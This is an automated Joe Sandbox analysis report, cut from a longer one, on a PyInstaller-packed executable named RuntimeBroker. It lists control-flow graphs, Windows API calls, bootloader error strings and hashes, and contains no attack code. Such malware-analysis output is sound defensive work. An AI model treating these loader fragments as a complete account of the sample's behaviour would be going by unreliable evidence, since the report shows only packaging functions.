7ff72b05391a-7ff72b053921 121->135 136 7ff72b053923-7ff72b053931 call 7ff72b056cd0 121->136 122->121 133 7ff72b053905-7ff72b05390c 122->133 126->106 130 7ff72b05395c-7ff72b053966 call 7ff72b0530e0 126->130 130->109 143 7ff72b05396c-7ff72b053980 call 7ff72b0583e0 130->143 138 7ff72b05393a-7ff72b053942 call 7ff72b052870 call 7ff72b056780 133->138 135->138 136->126 145 7ff72b053933 136->145 138->118 151 7ff72b0539a5-7ff72b0539e8 call 7ff72b057f20 call 7ff72b057fc0 call 7ff72b056780 call 7ff72b056510 call 7ff72b057ec0 143->151 152 7ff72b053982-7ff72b05399f PostMessageW GetMessageW 143->152 145->138 163 7ff72b053a3d-7ff72b053a4b call 7ff72b0518a0 151->163 164 7ff72b0539ea-7ff72b053a00 call 7ff72b0581f0 call 7ff72b057ec0 151->164 152->151 163->109 164->163 171 7ff72b053a02-7ff72b053a10 164->171 172 7ff72b053a31-7ff72b053a38 call 7ff72b052870 171->172 173 7ff72b053a12-7ff72b053a2c call 7ff72b0525f0 call 7ff72b0518a0 171->173 172->163 173->109
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileModuleName
                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                • API String ID: 514040917-585287483
                                                                                                                                                                                • Opcode ID: efb796b3bf6ec8d0981c1c4d1efedc325a5c1d28de3f7e835e546583a0e4ecb4
                                                                                                                                                                                • Instruction ID: c6cbb027dc0dd18342b7ebaadd52c9beb44e986c02aa15b1d28176b441667dbe
                                                                                                                                                                                • Opcode Fuzzy Hash: efb796b3bf6ec8d0981c1c4d1efedc325a5c1d28de3f7e835e546583a0e4ecb4
                                                                                                                                                                                • Instruction Fuzzy Hash: 1AF16061A0868251FA3AF728DD942F9E351FF44780FC48431DA5E43AB6EF2CE554DB60

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 335 7ff72b075c74-7ff72b075ce7 call 7ff72b0759a8 338 7ff72b075ce9-7ff72b075cf2 call 7ff72b0643d4 335->338 339 7ff72b075d01-7ff72b075d0b call 7ff72b067830 335->339 344 7ff72b075cf5-7ff72b075cfc call 7ff72b0643f4 338->344 345 7ff72b075d0d-7ff72b075d24 call 7ff72b0643d4 call 7ff72b0643f4 339->345 346 7ff72b075d26-7ff72b075d8f CreateFileW 339->346 362 7ff72b076042-7ff72b076062 344->362 345->344 347 7ff72b075e0c-7ff72b075e17 GetFileType 346->347 348 7ff72b075d91-7ff72b075d97 346->348 355 7ff72b075e19-7ff72b075e54 GetLastError call 7ff72b064368 CloseHandle 347->355 356 7ff72b075e6a-7ff72b075e71 347->356 352 7ff72b075dd9-7ff72b075e07 GetLastError call 7ff72b064368 348->352 353 7ff72b075d99-7ff72b075d9d 348->353 352->344 353->352 360 7ff72b075d9f-7ff72b075dd7 CreateFileW 353->360 355->344 370 7ff72b075e5a-7ff72b075e65 call 7ff72b0643f4 355->370 358 7ff72b075e79-7ff72b075e7c 356->358 359 7ff72b075e73-7ff72b075e77 356->359 365 7ff72b075e82-7ff72b075ed7 call 7ff72b067748 358->365 366 7ff72b075e7e 358->366 359->365 360->347 360->352 374 7ff72b075ed9-7ff72b075ee5 call 7ff72b075bb0 365->374 375 7ff72b075ef6-7ff72b075f27 call 7ff72b075728 365->375 366->365 370->344 374->375 382 7ff72b075ee7 374->382 380 7ff72b075f2d-7ff72b075f6f 375->380 381 7ff72b075f29-7ff72b075f2b 375->381 384 7ff72b075f91-7ff72b075f9c 380->384 385 7ff72b075f71-7ff72b075f75 380->385 383 7ff72b075ee9-7ff72b075ef1 call 7ff72b069dd0 381->383 382->383 383->362 387 7ff72b075fa2-7ff72b075fa6 384->387 388 7ff72b076040 384->388 385->384 386 7ff72b075f77-7ff72b075f8c 385->386 386->384 387->388 390 7ff72b075fac-7ff72b075ff1 CloseHandle CreateFileW 387->390 388->362 392 7ff72b076026-7ff72b07603b 390->392 393 7ff72b075ff3-7ff72b076021 GetLastError call 7ff72b064368 call 7ff72b067970 390->393 392->388 393->392
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                • Instruction ID: 112f096b2e6b38bd1263995ab04dd34f4cd571bdbe07d92a4589d685040b76e9
                                                                                                                                                                                • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                • Instruction Fuzzy Hash: 56C1D032B28A4186EB21DF68C8906BCB761FB49B98B810225DF1E577E5CF38E451D750

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057A1B
                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057A9E
                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057ABD
                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057ACB
                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057ADC
                                                                                                                                                                                • RemoveDirectoryW.KERNELBASE(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057AE5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                • Instruction ID: e126fa8f0f020adca5bcc0ab7dfd6aee301a81cff63fbca390087eb470560944
                                                                                                                                                                                • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                • Instruction Fuzzy Hash: D1417631A1C54695EE32BB28E8985B9E360FBD4754FC00631E59D42AE4DF3CE646DF10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                • Instruction ID: 680089955e522658c82d14722b38f44ac43070911214bb8180b7f320603f6d4d
                                                                                                                                                                                • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                • Instruction Fuzzy Hash: 86F04422A1974186F771AB68B89D766B350FB44768F840235DA6D02AE4DF3CE0598F14
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1010374628-0
                                                                                                                                                                                • Opcode ID: 218360e3f3d10e4cbbcaada49163fe180694c255536a250390631819a036c960
                                                                                                                                                                                • Instruction ID: f6893e653b26f76ca41efc14f6db7389539a8919a3830a08b2340caf2a3770f5
                                                                                                                                                                                • Opcode Fuzzy Hash: 218360e3f3d10e4cbbcaada49163fe180694c255536a250390631819a036c960
                                                                                                                                                                                • Instruction Fuzzy Hash: A3028121F1968240FA77BB2D9C41679D680EF49BA0FC9463DDD6D467F2EE3CA4019B20

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 179 7ff72b0518f0-7ff72b05192b call 7ff72b053f70 182 7ff72b051bc1-7ff72b051be5 call 7ff72b05b870 179->182 183 7ff72b051931-7ff72b051971 call 7ff72b0576a0 179->183 188 7ff72b051bae-7ff72b051bb1 call 7ff72b05f36c 183->188 189 7ff72b051977-7ff72b051987 call 7ff72b05f9f4 183->189 192 7ff72b051bb6-7ff72b051bbe 188->192 194 7ff72b051989-7ff72b05199c call 7ff72b052760 189->194 195 7ff72b0519a1-7ff72b0519bd call 7ff72b05f6bc 189->195 192->182 194->188 200 7ff72b0519d7-7ff72b0519ec call 7ff72b064154 195->200 201 7ff72b0519bf-7ff72b0519d2 call 7ff72b052760 195->201 206 7ff72b0519ee-7ff72b051a01 call 7ff72b052760 200->206 207 7ff72b051a06-7ff72b051a87 call 7ff72b051bf0 * 2 call 7ff72b05f9f4 200->207 201->188 206->188 215 7ff72b051a8c-7ff72b051a9f call 7ff72b064170 207->215 218 7ff72b051ab9-7ff72b051ad2 call 7ff72b05f6bc 215->218 219 7ff72b051aa1-7ff72b051ab4 call 7ff72b052760 215->219 224 7ff72b051aec-7ff72b051b08 call 7ff72b05f430 218->224 225 7ff72b051ad4-7ff72b051ae7 call 7ff72b052760 218->225 219->188 230 7ff72b051b1b-7ff72b051b29 224->230 231 7ff72b051b0a-7ff72b051b16 call 7ff72b0525f0 224->231 225->188 230->188 233 7ff72b051b2f-7ff72b051b3e 230->233 231->188 235 7ff72b051b40-7ff72b051b46 233->235 236 7ff72b051b48-7ff72b051b55 235->236 237 7ff72b051b60-7ff72b051b6f 235->237 238 7ff72b051b71-7ff72b051b7a 236->238 237->237 237->238 239 7ff72b051b7c-7ff72b051b7f 238->239 240 7ff72b051b8f 238->240 239->240 242 7ff72b051b81-7ff72b051b84 239->242 241 7ff72b051b91-7ff72b051bac 240->241 241->188 241->235 242->240 243 7ff72b051b86-7ff72b051b89 242->243 243->240 244 7ff72b051b8b-7ff72b051b8d 243->244 244->241
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _fread_nolock$Message
                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                • API String ID: 677216364-3497178890
                                                                                                                                                                                • Opcode ID: dc0f139388d23924eab9019b476ad9a86bee98d8b1b39e258b9181f8a10baedf
                                                                                                                                                                                • Instruction ID: 776e62adcac866bfbccf858c2dc779fd04f58f663f8d478aa28dd13a46b3d767
                                                                                                                                                                                • Opcode Fuzzy Hash: dc0f139388d23924eab9019b476ad9a86bee98d8b1b39e258b9181f8a10baedf
                                                                                                                                                                                • Instruction Fuzzy Hash: D4718771A1868695FB72EB1CD8902B9E391FF48B84F844035D98D47BA5EE2CE5858F20

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 245 7ff72b0515c0-7ff72b0515d1 246 7ff72b0515f7-7ff72b051611 call 7ff72b053f70 245->246 247 7ff72b0515d3-7ff72b0515dc call 7ff72b051050 245->247 252 7ff72b05163b-7ff72b051655 call 7ff72b053f70 246->252 253 7ff72b051613-7ff72b05163a call 7ff72b052760 246->253 254 7ff72b0515ee-7ff72b0515f6 247->254 255 7ff72b0515de-7ff72b0515e9 call 7ff72b0525f0 247->255 261 7ff72b051657-7ff72b05166c call 7ff72b0525f0 252->261 262 7ff72b051671-7ff72b051688 call 7ff72b05f9f4 252->262 255->254 267 7ff72b0517c5-7ff72b0517c8 call 7ff72b05f36c 261->267 268 7ff72b0516ab-7ff72b0516af 262->268 269 7ff72b05168a-7ff72b0516a6 call 7ff72b052760 262->269 274 7ff72b0517cd-7ff72b0517df 267->274 271 7ff72b0516c9-7ff72b0516e9 call 7ff72b064170 268->271 272 7ff72b0516b1-7ff72b0516bd call 7ff72b0511f0 268->272 280 7ff72b0517bd-7ff72b0517c0 call 7ff72b05f36c 269->280 281 7ff72b0516eb-7ff72b051707 call 7ff72b052760 271->281 282 7ff72b05170c-7ff72b051717 271->282 278 7ff72b0516c2-7ff72b0516c4 272->278 278->280 280->267 290 7ff72b0517b3-7ff72b0517b8 281->290 285 7ff72b05171d-7ff72b051726 282->285 286 7ff72b0517a6-7ff72b0517ae call 7ff72b06415c 282->286 289 7ff72b051730-7ff72b051752 call 7ff72b05f6bc 285->289 286->290 294 7ff72b051754-7ff72b05176c call 7ff72b05fdfc 289->294 295 7ff72b051785-7ff72b05178c 289->295 290->280 300 7ff72b05176e-7ff72b051771 294->300 301 7ff72b051775-7ff72b051783 294->301 296 7ff72b051793-7ff72b05179c call 7ff72b052760 295->296 304 7ff72b0517a1 296->304 300->289 303 7ff72b051773 300->303 301->296 303->304 304->286
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                • API String ID: 2030045667-1550345328
                                                                                                                                                                                • Opcode ID: bda84ca2821aa6497a9cc9950780242a8bb7c1fb7cb635ccc5623e3dbc2a9c83
                                                                                                                                                                                • Instruction ID: ad2a28cdf61541087b99246025801a567a93735240030d93452f4a7a7366fe91
                                                                                                                                                                                • Opcode Fuzzy Hash: bda84ca2821aa6497a9cc9950780242a8bb7c1fb7cb635ccc5623e3dbc2a9c83
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E518E61B0864691EA32BB1D9D901B9E3A0FF44B94FC48131DE1D47AB5EF3CE994DB20

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                • API String ID: 2895956056-699529898
                                                                                                                                                                                • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                • Instruction ID: c404638555abeb3a581b376031f73904b500fd55e5137030cea9cb5faedec2c3
                                                                                                                                                                                • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                • Instruction Fuzzy Hash: 97413F31A1878181DA31AB28E8952AEF391FBC9364F944739E6AD43BE5DF7CD1448F10

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 398 7ff72b0511f0-7ff72b05124d call 7ff72b05b0a0 401 7ff72b051277-7ff72b05128f call 7ff72b064170 398->401 402 7ff72b05124f-7ff72b051276 call 7ff72b0525f0 398->402 407 7ff72b0512ad-7ff72b0512bd call 7ff72b064170 401->407 408 7ff72b051291-7ff72b0512a8 call 7ff72b052760 401->408 414 7ff72b0512db-7ff72b0512ed 407->414 415 7ff72b0512bf-7ff72b0512d6 call 7ff72b052760 407->415 413 7ff72b051409-7ff72b05140e call 7ff72b05ad80 408->413 421 7ff72b051413-7ff72b05143d call 7ff72b06415c * 2 413->421 417 7ff72b0512f0-7ff72b051315 call 7ff72b05f6bc 414->417 415->413 424 7ff72b05131b-7ff72b051325 call 7ff72b05f430 417->424 425 7ff72b051401 417->425 424->425 431 7ff72b05132b-7ff72b051337 424->431 425->413 432 7ff72b051340-7ff72b051368 call 7ff72b0594e0 431->432 435 7ff72b05136a-7ff72b05136d 432->435 436 7ff72b0513e6-7ff72b0513fc call 7ff72b0525f0 432->436 437 7ff72b05136f-7ff72b051379 435->437 438 7ff72b0513e1 435->438 436->425 440 7ff72b05137b-7ff72b051389 call 7ff72b05fdfc 437->440 441 7ff72b0513a4-7ff72b0513a7 437->441 438->436 445 7ff72b05138e-7ff72b051391 440->445 443 7ff72b0513a9-7ff72b0513b7 call 7ff72b079140 441->443 444 7ff72b0513ba-7ff72b0513bf 441->444 443->444 444->432 447 7ff72b0513c5-7ff72b0513c8 444->447 450 7ff72b051393-7ff72b05139d call 7ff72b05f430 445->450 451 7ff72b05139f-7ff72b0513a2 445->451 448 7ff72b0513dc-7ff72b0513df 447->448 449 7ff72b0513ca-7ff72b0513cd 447->449 448->425 449->436 453 7ff72b0513cf-7ff72b0513d7 449->453 450->444 450->451 451->436 453->417
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                • API String ID: 2030045667-2813020118
                                                                                                                                                                                • Opcode ID: faa7d681abe3779c1ae0691c65826196ee58a6ed43a36f27d4001866343b9dcf
                                                                                                                                                                                • Instruction ID: 816ac3cef8c3e02c27e524ba84ecdd96675152057e8b172679f087e8ff222af3
                                                                                                                                                                                • Opcode Fuzzy Hash: faa7d681abe3779c1ae0691c65826196ee58a6ed43a36f27d4001866343b9dcf
                                                                                                                                                                                • Instruction Fuzzy Hash: A451A362A0864245EA72BB19AC903BAE291FF85794F844135DE4D47FE5EF3CE941CF20

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF72B053834), ref: 00007FF72B057CE4
                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF72B053834), ref: 00007FF72B057D2C
                                                                                                                                                                                  • Part of subcall function 00007FF72B057E10: GetEnvironmentVariableW.KERNEL32(00007FF72B05365F), ref: 00007FF72B057E47
                                                                                                                                                                                  • Part of subcall function 00007FF72B057E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF72B057E69
                                                                                                                                                                                  • Part of subcall function 00007FF72B067548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B067561
                                                                                                                                                                                  • Part of subcall function 00007FF72B0526C0: MessageBoxW.USER32 ref: 00007FF72B052736
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                • API String ID: 740614611-1339014028
                                                                                                                                                                                • Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
